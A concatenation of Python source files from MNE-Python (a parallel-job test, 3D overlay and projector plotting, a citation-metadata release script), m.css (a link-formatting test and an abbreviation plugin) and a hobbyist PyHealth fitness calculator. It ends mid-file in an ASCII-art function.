@pytest.mark.parametrize('n_jobs', [
None, 1, -1, 'loky 2', 'threading 3', 'multiprocessing 4',
])
def test_parallel_func(n_jobs):
"""Test Parallel wrapping."""
joblib = pytest.importorskip('joblib')
if os.getenv('MNE_FORCE_SERIAL', '').lower() in ('true', '1'):
pytest.skip('MNE_FORCE_SERIAL cannot be set')
def fun(x):
return x * 2
if isinstance(n_jobs, str):
backend, n_jobs = n_jobs.split()
n_jobs = want_jobs = int(n_jobs)
ctx = joblib.parallel_backend(backend, n_jobs)
n_jobs = None
else:
ctx = nullcontext()
if n_jobs is not None and n_jobs < 0:
want_jobs = multiprocessing.cpu_count() + 1 + n_jobs
else:
want_jobs = 1
with ctx:
parallel, p_fun, got_jobs = parallel_func(fun, n_jobs)
assert got_jobs == want_jobs
```
#### File: mne/viz/_3d_overlay.py
```python
from collections import OrderedDict
import numpy as np
from ..utils import logger
class _Overlay(object):
def __init__(self, scalars, colormap, rng, opacity, name):
self._scalars = scalars
self._colormap = colormap
assert rng is not None
self._rng = rng
self._opacity = opacity
self._name = name
def to_colors(self):
from ._3d import _get_cmap
from matplotlib.colors import Colormap, ListedColormap
if isinstance(self._colormap, str):
cmap = _get_cmap(self._colormap)
elif isinstance(self._colormap, Colormap):
cmap = self._colormap
else:
cmap = ListedColormap(
self._colormap / 255., name=str(type(self._colormap)))
logger.debug(
f'Color mapping {repr(self._name)} with {cmap.name} '
f'colormap and range {self._rng}')
rng = self._rng
assert rng is not None
scalars = self._norm(rng)
colors = cmap(scalars)
if self._opacity is not None:
colors[:, 3] *= self._opacity
return colors
def _norm(self, rng):
if rng[0] == rng[1]:
factor = 1 if rng[0] == 0 else 1e-6 * rng[0]
else:
factor = rng[1] - rng[0]
return (self._scalars - rng[0]) / factor
class _LayeredMesh(object):
def __init__(self, renderer, vertices, triangles, normals):
self._renderer = renderer
self._vertices = vertices
self._triangles = triangles
self._normals = normals
self._polydata = None
self._actor = None
self._is_mapped = False
self._current_colors = None
self._cached_colors = None
self._overlays = OrderedDict()
self._default_scalars = np.ones(vertices.shape)
self._default_scalars_name = 'Data'
def map(self):
kwargs = {
"color": None,
"pickable": True,
"rgba": True,
}
mesh_data = self._renderer.mesh(
x=self._vertices[:, 0],
y=self._vertices[:, 1],
z=self._vertices[:, 2],
triangles=self._triangles,
normals=self._normals,
scalars=self._default_scalars,
**kwargs
)
self._actor, self._polydata = mesh_data
self._is_mapped = True
def _compute_over(self, B, A):
assert A.ndim == B.ndim == 2
assert A.shape[1] == B.shape[1] == 4
A_w = A[:, 3:] # * 1
B_w = B[:, 3:] * (1 - A_w)
C = A.copy()
C[:, :3] *= A_w
C[:, :3] += B[:, :3] * B_w
C[:, 3:] += B_w
C[:, :3] /= C[:, 3:]
return np.clip(C, 0, 1, out=C)
def _compose_overlays(self):
B = cache = None
for overlay in self._overlays.values():
A = overlay.to_colors()
if B is None:
B = A
else:
cache = B
B = self._compute_over(cache, A)
return B, cache
def add_overlay(self, scalars, colormap, rng, opacity, name):
overlay = _Overlay(
scalars=scalars,
colormap=colormap,
rng=rng,
opacity=opacity,
name=name,
)
self._overlays[name] = overlay
colors = overlay.to_colors()
if self._current_colors is None:
self._current_colors = colors
else:
# save previous colors to cache
self._cached_colors = self._current_colors
self._current_colors = self._compute_over(
self._cached_colors, colors)
# apply the texture
self._apply()
def remove_overlay(self, names):
to_update = False
if not isinstance(names, list):
names = [names]
for name in names:
if name in self._overlays:
del self._overlays[name]
to_update = True
if to_update:
self.update()
def _apply(self):
if self._current_colors is None or self._renderer is None:
return
self._renderer._set_mesh_scalars(
mesh=self._polydata,
scalars=self._current_colors,
name=self._default_scalars_name,
)
def update(self, colors=None):
if colors is not None and self._cached_colors is not None:
self._current_colors = self._compute_over(
self._cached_colors, colors)
else:
self._current_colors, self._cached_colors = \
self._compose_overlays()
self._apply()
def _clean(self):
mapper = self._actor.GetMapper()
mapper.SetLookupTable(None)
self._actor.SetMapper(None)
self._actor = None
self._polydata = None
self._renderer = None
def update_overlay(self, name, scalars=None, colormap=None,
opacity=None, rng=None):
overlay = self._overlays.get(name, None)
if overlay is None:
return
if scalars is not None:
overlay._scalars = scalars
if colormap is not None:
overlay._colormap = colormap
if opacity is not None:
overlay._opacity = opacity
if rng is not None:
overlay._rng = rng
# partial update: use cache if possible
if name == list(self._overlays.keys())[-1]:
self.update(colors=overlay.to_colors())
else: # full update
self.update()
```
#### File: mne/viz/conftest.py
```python
import pytest
import numpy as np
import os.path as op
from mne import create_info, EvokedArray, events_from_annotations, Epochs
from mne.channels import make_standard_montage
from mne.datasets.testing import data_path, _pytest_param
from mne.io import read_raw_nirx
from mne.preprocessing.nirs import optical_density, beer_lambert_law
fname_nirx = op.join(data_path(download=False),
'NIRx', 'nirscout', 'nirx_15_2_recording_w_overlap')
@pytest.fixture()
def fnirs_evoked():
"""Create an fnirs evoked structure."""
montage = make_standard_montage('biosemi16')
ch_names = montage.ch_names
ch_types = ['eeg'] * 16
info = create_info(ch_names=ch_names, sfreq=20, ch_types=ch_types)
evoked_data = np.random.randn(16, 30)
evoked = EvokedArray(evoked_data, info=info, tmin=-0.2, nave=4)
evoked.set_montage(montage)
evoked.set_channel_types({'Fp1': 'hbo', 'Fp2': 'hbo', 'F4': 'hbo',
'Fz': 'hbo'}, verbose='error')
return evoked
@pytest.fixture(params=[_pytest_param()])
def fnirs_epochs():
"""Create an fnirs epoch structure."""
raw_intensity = read_raw_nirx(fname_nirx, preload=False)
raw_od = optical_density(raw_intensity)
raw_haemo = beer_lambert_law(raw_od, ppf=6.)
evts, _ = events_from_annotations(raw_haemo, event_id={'1.0': 1})
evts_dct = {'A': 1}
tn, tx = -1, 2
epochs = Epochs(raw_haemo, evts, event_id=evts_dct, tmin=tn, tmax=tx)
return epochs
```
#### File: mne/viz/_proj.py
```python
from copy import deepcopy
import numpy as np
from .evoked import _plot_evoked
from .topomap import _plot_projs_topomap
from .utils import plt_show, _check_type_projs
from ..defaults import DEFAULTS
from ..io.pick import _picks_to_idx
from ..utils import _validate_type, warn, _pl, verbose
@verbose
def plot_projs_joint(projs, evoked, picks_trace=None, *, topomap_kwargs=None,
show=True, verbose=None):
"""Plot projectors and evoked jointly.
Parameters
----------
projs : list of Projection
The projectors to plot.
evoked : instance of Evoked
The data to plot. Typically this is the evoked instance created from
averaging the epochs used to create the projection.
%(picks_plot_projs_joint_trace)s
topomap_kwargs : dict | None
Keyword arguments to pass to :func:`mne.viz.plot_projs_topomap`.
%(show)s
%(verbose)s
Returns
-------
fig : instance of matplotlib Figure
The figure.
Notes
-----
This function creates a figure with three columns:
1. The left shows the evoked data traces before (black) and after (green)
projection.
2. The center shows the topomaps associated with each of the projectors.
3. The right again shows the data traces (black), but this time with:
1. The data projected onto each projector with a single normalization
factor (solid lines). This is useful for seeing the relative power
in each projection vector.
2. The data projected onto each projector with individual normalization
factors (dashed lines). This is useful for visualizing each time
course regardless of its power.
3. Additional data traces from ``picks_trace`` (solid yellow lines).
This is useful for visualizing the "ground truth" of the time
course, e.g. the measured EOG or ECG channel time courses.
.. versionadded:: 1.1
"""
import matplotlib.pyplot as plt
from ..evoked import Evoked
_validate_type(evoked, Evoked, 'evoked')
_validate_type(topomap_kwargs, (None, dict), 'topomap_kwargs')
projs = _check_type_projs(projs)
topomap_kwargs = dict() if topomap_kwargs is None else topomap_kwargs
if picks_trace is not None:
picks_trace = _picks_to_idx(
evoked.info, picks_trace, allow_empty=False)
info = evoked.info
ch_types = evoked.get_channel_types(unique=True, only_data_chs=True)
proj_by_type = dict() # will be set up like an enumerate key->[pi, proj]
ch_names_by_type = dict()
used = np.zeros(len(projs), int)
for ch_type in ch_types:
these_picks = _picks_to_idx(info, ch_type, allow_empty=True)
these_chs = [evoked.ch_names[pick] for pick in these_picks]
ch_names_by_type[ch_type] = these_chs
for pi, proj in enumerate(projs):
if not set(these_chs).intersection(proj['data']['col_names']):
continue
if ch_type not in proj_by_type:
proj_by_type[ch_type] = list()
proj_by_type[ch_type].append([pi, deepcopy(proj)])
used[pi] += 1
missing = (~used.astype(bool)).sum()
if missing:
warn(f'{missing} projector{_pl(missing)} had no channel names '
'present in epochs')
del projs
ch_types = list(proj_by_type) # reduce to number we actually need
# room for legend
max_proj_per_type = max(len(x) for x in proj_by_type.values())
cs_trace = 3
cs_topo = 2
n_col = max_proj_per_type * cs_topo + 2 * cs_trace
n_row = len(ch_types)
shape = (n_row, n_col)
fig = plt.figure(figsize=(n_col * 1.1 + 0.5, n_row * 1.8 + 0.5),
constrained_layout=True)
ri = 0
# pick some sufficiently distinct colors (6 per proj type, e.g., ECG,
# should be enough hopefully!)
# https://personal.sron.nl/~pault/data/colourschemes.pdf
# "Vibrant" color scheme
proj_colors = [
'#CC3311', # red
'#009988', # teal
'#0077BB', # blue
'#EE3377', # magenta
'#EE7733', # orange
'#33BBEE', # cyan
]
trace_color = '#CCBB44' # yellow
after_color, after_name = '#228833', 'green'
type_titles = DEFAULTS['titles']
last_ax = [None] * 2
first_ax = dict()
pe_kwargs = dict(show=False, draw=False)
for ch_type, these_projs in proj_by_type.items():
these_idxs, these_projs = zip(*these_projs)
ch_names = ch_names_by_type[ch_type]
idx = np.where([np.in1d(ch_names, proj['data']['col_names']).all()
for proj in these_projs])[0]
used[idx] += 1
count = len(these_projs)
for proj in these_projs:
sub_idx = [proj['data']['col_names'].index(name)
for name in ch_names]
proj['data']['data'] = proj['data']['data'][:, sub_idx]
proj['data']['col_names'] = ch_names
ba_ax = plt.subplot2grid(
shape, (ri, 0), colspan=cs_trace, fig=fig)
topo_axes = [
plt.subplot2grid(
shape, (ri, ci * cs_topo + cs_trace), colspan=cs_topo, fig=fig)
for ci in range(count)]
tr_ax = plt.subplot2grid(
shape, (ri, n_col - cs_trace), colspan=cs_trace, fig=fig)
# topomaps
_plot_projs_topomap(these_projs, info=info, show=False,
axes=topo_axes, **topomap_kwargs)
for idx, proj, ax_ in zip(these_idxs, these_projs, topo_axes):
ax_.set_title('') # could use proj['desc'] but it's long
ax_.set_xlabel(f'projs[{idx}]', fontsize='small')
unit = DEFAULTS['units'][ch_type]
# traces
this_evoked = evoked.copy().pick_channels(ch_names)
p = np.concatenate([p['data']['data'] for p in these_projs])
assert p.shape == (len(these_projs), len(this_evoked.data))
traces = np.dot(p, this_evoked.data)
traces *= np.sign(np.mean(
np.dot(this_evoked.data, traces.T), 0))[:, np.newaxis]
if picks_trace is not None:
ch_traces = evoked.data[picks_trace]
ch_traces -= np.mean(ch_traces, axis=1, keepdims=True)
ch_traces /= np.abs(ch_traces).max()
_plot_evoked(this_evoked, picks='all', axes=[tr_ax], **pe_kwargs)
for line in tr_ax.lines:
line.set(lw=0.5, zorder=3)
for t in list(tr_ax.texts):
t.remove()
scale = 0.8 * np.abs(tr_ax.get_ylim()).max()
hs, labels = list(), list()
traces /= np.abs(traces).max() # uniformly scaled
for ti, trace in enumerate(traces):
hs.append(tr_ax.plot(
this_evoked.times, trace * scale,
color=proj_colors[ti % len(proj_colors)], zorder=5)[0])
labels.append(f'projs[{these_idxs[ti]}]')
traces /= np.abs(traces).max(1, keepdims=True) # independently
for ti, trace in enumerate(traces):
tr_ax.plot(
this_evoked.times, trace * scale,
color=proj_colors[ti % len(proj_colors)], zorder=3.5,
ls='--', lw=1., alpha=0.75)
if picks_trace is not None:
trace_ch = [evoked.ch_names[pick] for pick in picks_trace]
if len(picks_trace) == 1:
trace_ch = trace_ch[0]
hs.append(tr_ax.plot(
this_evoked.times, ch_traces.T * scale, color=trace_color,
lw=3, zorder=4, alpha=0.75)[0])
labels.append(str(trace_ch))
tr_ax.set(title='', xlabel='', ylabel='')
# This will steal space from the subplots in a constrained layout
# https://matplotlib.org/3.5.0/tutorials/intermediate/constrainedlayout_guide.html#legends # noqa: E501
tr_ax.legend(
hs, labels, loc='center left', borderaxespad=0.05,
bbox_to_anchor=[1.05, 0.5])
last_ax[1] = tr_ax
key = 'Projected time course'
if key not in first_ax:
first_ax[key] = tr_ax
# Before and after traces
_plot_evoked(this_evoked, picks='all', axes=[ba_ax], **pe_kwargs)
for line in ba_ax.lines:
line.set(lw=0.5, zorder=3)
loff = len(ba_ax.lines)
this_proj_evoked = this_evoked.copy().add_proj(these_projs)
# with meg='combined' any existing mag projectors (those already part
# of evoked before we add_proj above) will have greatly
# reduced power, so we ignore the warning about this issue
this_proj_evoked.apply_proj(verbose='error')
_plot_evoked(this_proj_evoked, picks='all', axes=[ba_ax], **pe_kwargs)
for line in ba_ax.lines[loff:]:
line.set(lw=0.5, zorder=4, color=after_color)
for t in list(ba_ax.texts):
t.remove()
ba_ax.set(title='', xlabel='')
ba_ax.set(ylabel=f'{type_titles[ch_type]}\n{unit}')
last_ax[0] = ba_ax
key = f'Before (black) and after ({after_name})'
if key not in first_ax:
first_ax[key] = ba_ax
ri += 1
for ax in last_ax:
ax.set(xlabel='Time (sec)')
for title, ax in first_ax.items():
ax.set_title(title, fontsize='medium')
plt_show(show)
return fig
```
#### File: mne-python/tools/generate_codemeta.py
```python
import os
import subprocess
from datetime import date
from mne import __version__ as release_version
# NOTE: ../codemeta.json and ../citation.cff should not be continuously
# updated. Run this script only at release time.
package_name = 'MNE-Python'
hard_dependencies = ('numpy', 'scipy')
release_date = str(date.today())
commit = subprocess.run(['git', 'log', '-1', '--pretty=%H'],
capture_output=True, text=True).stdout.strip()
# KEYWORDS
keywords = (
'MEG',
'magnetoencephalography',
'EEG',
'electroencephalography',
'fNIRS',
'functional near-infrared spectroscopy',
'iEEG',
'intracranial EEG',
'eCoG',
'electrocorticography',
'DBS',
'deep brain stimulation'
)
# add to these as necessary
compound_surnames = (
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'de <NAME>orre',
'de Montalivet',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
'<NAME>',
)
def parse_name(name):
"""Split name blobs from `git shortlog -nse` into first/last/email."""
# remove commit count
_, name_and_email = name.strip().split('\t')
name, email = name_and_email.split(' <')
email = email.strip('>')
email = '' if 'noreply' in email else email # ignore "noreply" emails
name = ' '.join(name.split('.')) # remove periods from initials
# handle compound surnames
for compound_surname in compound_surnames:
if name.endswith(compound_surname):
ix = name.index(compound_surname)
first = name[:ix].strip()
last = compound_surname
return (first, last, email)
# handle non-compound surnames
name_elements = name.split()
if len(name_elements) == 1: # mononyms / usernames
first = ''
last = name
else:
first = ' '.join(name_elements[:-1])
last = name_elements[-1]
return (first, last, email)
# MAKE SURE THE RELEASE STRING IS PROPERLY FORMATTED
try:
split_version = list(map(int, release_version.split('.')))
except ValueError:
raise
msg = f'version string must be X.Y.Z (all integers), got {release_version}'
assert len(split_version) == 3, msg
# RUN GIT SHORTLOG TO GET ALL AUTHORS, SORTED BY NUMBER OF COMMITS
args = ['git', 'shortlog', '-nse']
result = subprocess.run(args, capture_output=True, text=True)
lines = result.stdout.strip().split('\n')
all_names = [parse_name(line) for line in lines]
# CONSTRUCT JSON AUTHORS LIST
json_authors = [f'''{{
"@type":"Person",
"email":"{email}",
"givenName":"{first}",
"familyName": "{last}"
}}''' for (first, last, email) in all_names]
# GET OUR DEPENDENCY VERSIONS
with open(os.path.join('..', 'setup.py'), 'r') as fid:
for line in fid:
if line.strip().startswith('python_requires='):
version = line.strip().split('=', maxsplit=1)[1].strip("'\",")
dependencies = [f'python{version}']
break
with open(os.path.join('..', 'requirements.txt'), 'r') as fid:
for line in fid:
req = line.strip()
for hard_dep in hard_dependencies:
if req.startswith(hard_dep):
dependencies.append(req)
# these must be done outside the boilerplate (no \n allowed in f-strings):
json_authors = ',\n '.join(json_authors)
dependencies = '",\n "'.join(dependencies)
json_keywords = '",\n "'.join(keywords)
# ASSEMBLE COMPLETE JSON
codemeta_boilerplate = f'''{{
"@context": "https://doi.org/10.5063/schema/codemeta-2.0",
"@type": "SoftwareSourceCode",
"license": "https://spdx.org/licenses/BSD-3-Clause",
"codeRepository": "git+https://github.com/mne-tools/mne-python.git",
"dateCreated": "2010-12-26",
"datePublished": "2014-08-04",
"dateModified": "{release_date}",
"downloadUrl": "https://github.com/mne-tools/mne-python/archive/v{release_version}.zip",
"issueTracker": "https://github.com/mne-tools/mne-python/issues",
"name": "{package_name}",
"version": "{release_version}",
"description": "{package_name} is an open-source Python package for exploring, visualizing, and analyzing human neurophysiological data. It provides methods for data input/output, preprocessing, visualization, source estimation, time-frequency analysis, connectivity analysis, machine learning, and statistics.",
"applicationCategory": "Neuroscience",
"developmentStatus": "active",
"referencePublication": "https://doi.org/10.3389/fnins.2013.00267",
"keywords": [
"{json_keywords}"
],
"programmingLanguage": [
"Python"
],
"operatingSystem": [
"Linux",
"Windows",
"macOS"
],
"softwareRequirements": [
"{dependencies}"
],
"author": [
{json_authors}
]
}}
''' # noqa E501
# WRITE TO FILE
with open(os.path.join('..', 'codemeta.json'), 'w') as codemeta_file:
codemeta_file.write(codemeta_boilerplate)
# # # # # # # # # # # # # # #
# GENERATE CITATION.CFF TOO #
# # # # # # # # # # # # # # #
message = ('If you use this software, please cite both the software itself, '
'and the paper listed in the preferred-citation field.')
# in CFF, multi-word keywords need to be wrapped in quotes
cff_keywords = (f'"{kw}"' if ' ' in kw else kw for kw in keywords)
# make into a bulleted list
cff_keywords = '\n'.join(f' - {kw}' for kw in cff_keywords)
# TODO: someday would be nice to include ORCiD identifiers too
cff_authors = [f' - family-names: {last}\n given-names: {first}'
if first else
f' - name: {last}'
for (first, last, _) in all_names]
cff_authors = '\n'.join(cff_authors)
# this ↓↓↓ is the meta-DOI that always resolves to the latest release
zenodo_doi = '10.5281/zenodo.592483'
# ASSEMBLE THE CFF STRING
cff_boilerplate = f'''\
cff-version: 1.2.0
title: "{package_name}"
message: "{message}"
version: {release_version}
date-released: "{release_date}"
commit: {commit}
doi: {zenodo_doi}
keywords:
{cff_keywords}
authors:
{cff_authors}
preferred-citation:
title: "MEG and EEG Data Analysis with MNE-Python"
journal: "Frontiers in Neuroscience"
type: article
year: 2013
volume: 7
issue: 267
start: 1
end: 13
doi: 10.3389/fnins.2013.00267
authors:
- family-names: Gramfort
given-names: Alexandre
- family-names: Luessi
given-names: Martin
- family-names: Larson
given-names: Eric
- family-names: Engemann
given-names: <NAME>.
- family-names: Strohmeier
given-names: Daniel
- family-names: Brodbeck
given-names: Christian
- family-names: Goj
given-names: Roman
- family-names: Jas
given-names: Mainak
- family-names: Brooks
given-names: Teon
- family-names: Parkkonen
given-names: Lauri
- family-names: Hämäläinen
given-names: <NAME>.
'''
# WRITE TO FILE
with open(os.path.join('..', 'CITATION.cff'), 'w') as cff_file:
cff_file.write(cff_boilerplate)
``` |
{
"source": "0rganizers/m.css",
"score": 2
} |
#### File: documentation/test_python/test_link_formatting.py
```python
import os
import unittest
from typing import List
from . import BaseInspectTestCase
from python import EntryType, default_id_formatter
from _search import searchdata_format_version
def custom_url_formatter(type: EntryType, path: List[str]) -> str:
if type == EntryType.CLASS:
filename = 'c.' + '.'.join(path) + '.html'
elif type == EntryType.MODULE:
filename = 'm.' + '.'.join(path) + '.html'
elif type == EntryType.PAGE:
filename = 'p.' + '.'.join(path) + '.html'
elif type == EntryType.SPECIAL:
filename = 's.' + '.'.join(path) + '.html'
elif type == EntryType.STATIC:
assert len(path) == 1
url = os.path.basename(path[0])
# Encode version information into the search driver
if url == 'search.js':
url = 'search-v{}.js'.format(searchdata_format_version)
# Everything except the search data (which don't exist yet) should be
# absolute
if url != 'absolutesearchdata-v{}.bin'.format(searchdata_format_version):
assert os.path.isabs(path[0]) and os.path.exists(path[0]), path[0]
filename = 't.' + url
else: assert False
return filename, filename + "#this-is-an-url"
def custom_id_formatter(type: EntryType, path: List[str]) -> str:
if type == EntryType.FUNCTION:
return 'f-' + '-'.join(path)
if type == EntryType.OVERLOADED_FUNCTION:
# Reuse the original hasher so we can test its behavior
return 'o-' + default_id_formatter(type, path)
if type == EntryType.PROPERTY:
return 'p-' + '-'.join(path)
if type == EntryType.ENUM:
return 'e-' + '-'.join(path)
if type == EntryType.ENUM_VALUE:
return 'v-' + '-'.join(path)
if type == EntryType.DATA:
return 'd-' + '-'.join(path)
assert False
class LinkFormatting(BaseInspectTestCase):
def test(self):
self.run_python({
'INPUT_PAGES': ['page.rst'],
'URL_FORMATTER': custom_url_formatter,
'ID_FORMATTER': custom_id_formatter,
'PLUGINS': ['m.images'],
'LINKS_NAVBAR1': [
('Pages', 'pages', []),
('Modules', 'modules', []),
('Classes', 'classes', [])],
'LINKS_NAVBAR2': [('A page', 'page', []),
('A module', 'link_formatting', []),
('The class', ['link_formatting', 'Class'], [])],
'FAVICON': 'favicon-light.png',
'SEARCH_DISABLED': False, # to test search link formatting, too
'SEARCH_HELP': 'blub?',
'SEARCH_DOWNLOAD_BINARY': 'absolutesearchdata-v{}.bin'.format(searchdata_format_version),
'PYBIND11_COMPATIBILITY': True
})
self.assertEqual(*self.actual_expected_contents('m.link_formatting.html'))
self.assertEqual(*self.actual_expected_contents('m.link_formatting.sub.html'))
self.assertEqual(*self.actual_expected_contents('c.link_formatting.Class.html'))
self.assertEqual(*self.actual_expected_contents('c.link_formatting.Class.Sub.html'))
self.assertEqual(*self.actual_expected_contents('p.page.html'))
self.assertEqual(*self.actual_expected_contents('s.classes.html'))
self.assertEqual(*self.actual_expected_contents('s.modules.html'))
self.assertEqual(*self.actual_expected_contents('s.pages.html'))
# There's nothing inside s.index.html that wouldn't be already covered
# by others
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/s.index.html')))
# Verify pybind11 overloaded function hashing as well
self.assertEqual(*self.actual_expected_contents('m.link_formatting.pybind.html'))
self.assertEqual(*self.actual_expected_contents('c.link_formatting.pybind.Foo.html'))
# Static data
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.favicon-light.png')))
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.m-dark+documentation.compiled.css')))
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.search-v{}.js'.format(searchdata_format_version))))
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.absolutesearchdata-v{}.bin'.format(searchdata_format_version))))
self.assertTrue(os.path.exists(os.path.join(self.path, 'output/t.tiny.png')))
```
#### File: plugins/m/abbr.py
```python
import re
from docutils import nodes, utils
from docutils.parsers import rst
from docutils.parsers.rst.roles import set_classes
# to avoid dependencies, link_regexp and parse_link() is common for m.abbr,
# m.gh, m.gl, m.link and m.vk
link_regexp = re.compile(r'(?P<title>.*) <(?P<link>.+)>')
def parse_link(text):
link = utils.unescape(text)
m = link_regexp.match(link)
if m: return m.group('title', 'link')
return None, link
def abbr(name, rawtext, text, lineno, inliner, options={}, content=[]):
abbr, title = parse_link(text)
set_classes(options)
if not abbr:
return [nodes.abbreviation(title, title, **options)], []
return [nodes.abbreviation(abbr, abbr, title=title, **options)], []
def register_mcss(**kwargs):
rst.roles.register_local_role('abbr', abbr)
register = register_mcss # for Pelican
``` |
{
"source": "0rion5/PyHealth",
"score": 3
} |
#### File: 0rion5/PyHealth/PyHealth.py
```python
class PyHealth:
"""This class initializes 5 methods used for calculating health and fitness metrics"""
def __init__(self):
self.data= []
def basal_metabolic_rate():
import BasalMetabolicRate
BasalMetabolicRate.setup()
BasalMetabolicRate.main()
main_menu= setup()
return main_menu
def body_mass_index():
import BodyMassIndex
BMI= BodyMassIndex.main()
return round(BMI, 2)
def one_rep_max():
import OneRepMax
upper_rm= OneRepMax.OneRepMax.upper(int(input("Upper Body 4-6 Rep Max in kg: ")))
lower_rm= OneRepMax.OneRepMax.lower(int(input("Lower Body 4-6 Rep Max in kg: ")))
print("\nYour recommended upper is: {}\nYour recommended lower is: {}\n".format(round(upper_rm),round(lower_rm)))
return [upper_rm, lower_rm]
def target_heart_rate():
import TargetHeartRate
return TargetHeartRate.main()
def vo2max():
"""Gets vo2 max class from module and returns estimated vo2max """
import Vo2Max
age= int(input("Enter Age: "))
gender = input("Gender m/f: ")
if gender[0::].lower() == 'm':
gender= 1
elif gender[0::].lower() == 'f':
gender = 0
weight = float(input("weight in lbs: "))
walk_time_mins = int(input("Enter walk time in mins: "))
heart_rate = int(input("Heart rate: "))
VO2max= Vo2Max.Vo2Max.vo2max(age, gender,weight,walk_time_mins, heart_rate)
return VO2max
#%%
def menu():
while True:
PyHealth_dict= {
1 : "Basal Metabolic Rate" ,
2 : "Body Mass Index" ,
3 : "One Rep Max" ,
4 : "Target Heart Rate" ,
5 : "Vo2 Max"
}
print("\nPyHealth Menu Options: ")
print("(1) Basal Metabolic Rate\n(2) Body Mass Index\n(3) One Rep Max\n(4) Target Heart Rate\n(5) VO2 Max")
option= int(input("Choose an option 1 to 5: "))
for key in list(PyHealth_dict):
if key == option:
result= PyHealth_dict[key]
return result
print(result)
else:
return menu()
#%%
def yes_no(user_input):
option= lambda x: x[0:1].lower()
while True:
choice= option(user_input)
if choice=='y':
# Return yes
return 'yes'
elif choice=='n':
# Return no
return 'no'
else:
# Return yes_no() function
return yes_no(input("Continue? Y/n: "))
#%%
def main():
return setup()
#%%
def setup():
menu_option= menu()
print("\nYou've chosen "+str(menu_option))
if yes_no(input("Would you like to continue? y/n: "))=="yes":
runProgram = True
while runProgram:
try:
if menu_option == "Basal Metabolic Rate":
return PyHealth.basal_metabolic_rate()
elif menu_option == "Body Mass Index":
bmi= PyHealth.body_mass_index()
return bmi
elif menu_option == "One Rep Max":
return PyHealth.one_rep_max()
elif menu_option == "Target Heart Rate":
return PyHealth.target_heart_rate()
elif menu_option == "Vo2 Max":
return PyHealth.vo2max()
except KeyboardInterrupt:
PyHealth.setup()
else:setup()
#%%
def destroy():
import sys
sys.exit()
#%%
def initialize():
import time
time.sleep(0.1)
print(" _ _ ")
time.sleep(0.1)
print(" _ _ | | | | _ _ ")
time.sleep(0.1)
print(" | || || | | || || | ")
time.sleep(0.1)
print(" =H| || || |========nnnn=============nnnn========| || || |H= ")
time.sleep(0.1)
print(" |_||_|| | | | | | | ||_||_| ")
time.sleep(0.1)
print(" |_| / | | \ |_| ")
time.sleep(0.1)
print(" | | | | ")
time.sleep(0.1)
print(" \ (_ /~~~\ _) / ")
time.sleep(0.1)
print(" \ \ ( '_' ) / / ")
time.sleep(0.1)
print(" \ )\ = /( / ")
time.sleep(0.1)
print(" \ (_) (_) / ")
time.sleep(0.1)
print(" \ / ~~~ \ / ")
time.sleep(0.1)
print(" ( ) ")
time.sleep(0.1)
print(" \ / ")
time.sleep(0.1)
print(" \ / ")
time.sleep(0.1)
print(" )==(O)==( ")
time.sleep(0.1)
print(" / \ /")
time.sleep(0.1)
print(" /____/ \____\ /")
time.sleep(0.1)
print(" / / \ \ /")
time.sleep(0.1)
print(" / / \ \ /")
time.sleep(0.1)
print(" ( ) ( ) ")
time.sleep(0.1)
print(" | | | | ")
time.sleep(0.1)
print(" | | | | ")
time.sleep(0.1)
print(" |___| |___| ")
time.sleep(0.1)
print(" (___) (___) ")
time.sleep(0.1)
print("======================================================================")
time.sleep(0.1)
print(" _____ _ _ _ _ _ ")
time.sleep(0.1)
print(" | __ \ | | | | | | | | | ")
time.sleep(0.1)
print(" | |__) | _| |__| | ___ __ _| | |_| |__ ")
time.sleep(0.1)
print(" | ___/ | | | __ |/ _ \/ _` | | __| '_ \ ")
time.sleep(0.1)
print(" | | | |_| | | | | __/ (_| | | |_| | | |")
time.sleep(0.1)
print(" |_| \__, |_| |_|\___|\__,_|_|\__|_| |_|")
time.sleep(0.1)
print(" __/ | ")
time.sleep(0.1)
print(" |___/ ")
time.sleep(0.1)
print("The programs included are free software;")
time.sleep(0.3)
print("the exact license terms for each program are described in the")
time.sleep(0.3)
print("individual files in /PyHealth/license.\n")
time.sleep(0.3)
print("Calculate your target heart rate with python.\n")
time.sleep(0.3)
print("This program uses the different methods of determining the health related calculatoins.\n")
time.sleep(0.3)
print("Acheive Goals Faster and increase performace with data you can use.")
time.sleep(0.3)
#%%
# Program Starts Here
try:
if __name__ == "__main__":
initialize()
main()
except KeyboardInterrupt:
import sys
sys.exit()
```
#### File: 0rion5/PyHealth/TargetHeartRate.py
```python
def target_heart_rate_program_init():
import time
print("________¶¶ ")
time.sleep(0.1)
print("____¶___¶¶¶ ")
time.sleep(0.1)
print("____¶¶¶_¶_¶¶¶ ")
time.sleep(0.1)
print("_____¶¶¶¶¶__¶¶ ")
time.sleep(0.1)
print("¶¶¶____¶¶¶¶__¶¶ ")
time.sleep(0.1)
print("_¶¶¶¶¶¶¶¶¶¶¶__¶¶ ")
time.sleep(0.1)
print("__¶¶¶_¶¶¶¶¶¶¶__¶¶ ")
time.sleep(0.1)
print("____¶¶_¶¶¶¶¶¶¶_¶¶ ")
time.sleep(0.1)
print("_____¶¶_¶¶¶¶¶¶¶¶¶___________¶¶¶¶¶ ")
time.sleep(0.1)
print("_______¶¶¶¶¶¶¶¶¶¶_________¶¶¶¶_¶¶¶¶ ")
time.sleep(0.1)
print("________¶¶¶¶¶¶¶¶¶_______¶¶¶_______¶¶ ")
time.sleep(0.1)
print("_____________¶¶¶¶¶_____¶¶¶___¶¶____¶¶ ")
time.sleep(0.1)
print("_______________¶¶¶¶___¶¶¶__¶¶¶¶¶____¶¶ ")
time.sleep(0.1)
print("_________________¶¶¶_¶¶¶__¶¶___¶¶___¶¶¶ ")
time.sleep(0.1)
print("__________________¶¶¶¶___¶¶_____¶____¶¶ ")
time.sleep(0.1)
print("___________________¶¶¶¶_¶¶______¶¶___¶¶ ")
time.sleep(0.1)
print("___________________¶¶¶¶¶¶___¶¶__¶¶___¶¶ ")
time.sleep(0.1)
print("___________________¶_¶¶¶¶__¶¶¶__¶¶___¶¶ ")
time.sleep(0.1)
print("__________________¶¶__¶¶¶¶¶__¶__¶¶___¶¶ ")
time.sleep(0.1)
